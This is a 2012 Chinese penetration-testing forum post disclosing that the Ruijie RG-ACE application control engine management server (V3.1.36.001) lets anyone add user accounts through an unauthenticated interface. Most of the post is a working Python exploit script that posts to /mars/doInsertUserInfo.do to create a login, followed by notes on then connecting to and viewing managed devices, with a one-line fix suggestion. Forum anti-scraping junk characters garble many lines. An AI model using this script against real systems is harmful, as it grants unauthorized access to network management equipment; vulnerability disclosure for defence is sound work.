找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2084|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
+ q- N/ J( k1 K7 k6 E. _' k- p& H' @$ T6 M9 h! r  F

; e  c. c# \" {, k4 D  N0 R测试的具体版本是, y5 |2 T$ ?$ F; h/ d
产品名称: 锐捷应用控制引擎8 W4 }! }5 e) w- M5 e
版本号: 3.1.36.001 TC5 R3 O; K4 H5 I4 M; y0 O( h1 o$ O$ v
编译时间: 201104291730
, e- x2 X3 R2 I. G+ B6 H
5 q' U. f3 J. w0 c- R7 G  t* V7 l4 |1 k9 n( u, ~  B
漏洞证明:
  Y9 K. B; j. Q# @5 `& @% t+ A0 F ; X6 I" n/ X, L+ o3 j8 ^# u& A
4 z8 T! F% G  m  }! t

; u4 S- l7 ^4 L& u3 `* c. y3 s8 X6 H7 L* h' P* |6 I: {6 w$ P& P1 J8 V
+ A* \% v' F3 M  {6 a
/ L+ g9 ?, h: m
执行脚本
! ]+ N" x- [) t. U, Z7 n#! /usr/bin/env python" I% D! v7 Y0 ^* E" s1 l. {4 V
#coding=gbk
9 |3 E+ Z6 m! D#RG-ACE管理服务器 V3.1.36.001' q1 A( F" v9 p- Q% ]+ b- h
import urllib2, urllib,cookielib
& m8 n; a% H. @4 A$ Murl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP2 M3 `' M. [2 q6 _; h
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
. y7 B6 F5 T" N9 _; j8 X3 K% yopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]# c% X3 p5 W7 {% p( J  G/ O2 m$ d
post=(("event","userManager.doInsertUserInfo"),
! h' V/ Q: D# j: k3 k0 @("useractionname","addButtonValue")," {! D& q+ \2 K+ d! X/ `# }
("useropermanager","userManager"),& g, ]2 W5 e' g- P; h
("userName","t"), #######账号自己加
1 t+ j' C  [- Z' n% L("pwd","aaaaaa"),######密码自己加
- r. J3 \% j& _2 O0 W("trueName","ad"),
2 u1 l" c, a" W% P/ s  d5 c6 [("email",""),- j+ H. J# A# F1 x
("mobilePhone",""),& T5 w; O/ I* X1 o, x& p
("officePhone",""),
* E; x* D8 _) Q) J* u/ N( l("addr",""),
( g+ E( ?) t9 v("submit","确定"))* a4 X# g8 v' ]" D% p5 N! f3 {0 w: w' q
urllib2.install_opener(opener)
& E% M1 n, Q1 t" Ip=urllib2.urlopen(url, urllib.urlencode(post)).read()
. ~! `* u% }0 C- Y! D, B' Eprint "Done"
7 p0 ]' B" F3 a4 Q3 h( u  U2 \" n# h! W1 Y$ E
登录,连接设备* f2 n5 b3 U2 C$ p' B! ~
6 ~# o2 k$ p0 S, T9 p
7 b9 O% H% E; Z6 z' j
; x: S4 t4 S7 Q/ v( J( N

9 ~2 M5 @! z4 C  B: v0 |
4 z$ B; p( A4 ?0 s' t; |默认的管理员admin权限更大点  D/ X, C* ^9 D  x7 D0 K

" U7 N7 J% B% K( u3 Z1 G/ O
7 N5 x# _# e- E1 N+ u. d# R) O: s/ h+ O6 x
& }0 F8 ~4 m' S4 R9 V4 S
9 \. e6 }0 {: a; h. X, f* h2 z5 s
修复方案:
1 v; N8 X7 f1 K加强对接口的权限验证& q8 J4 r9 ^5 N3 O
9 p" S2 f# M$ e
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表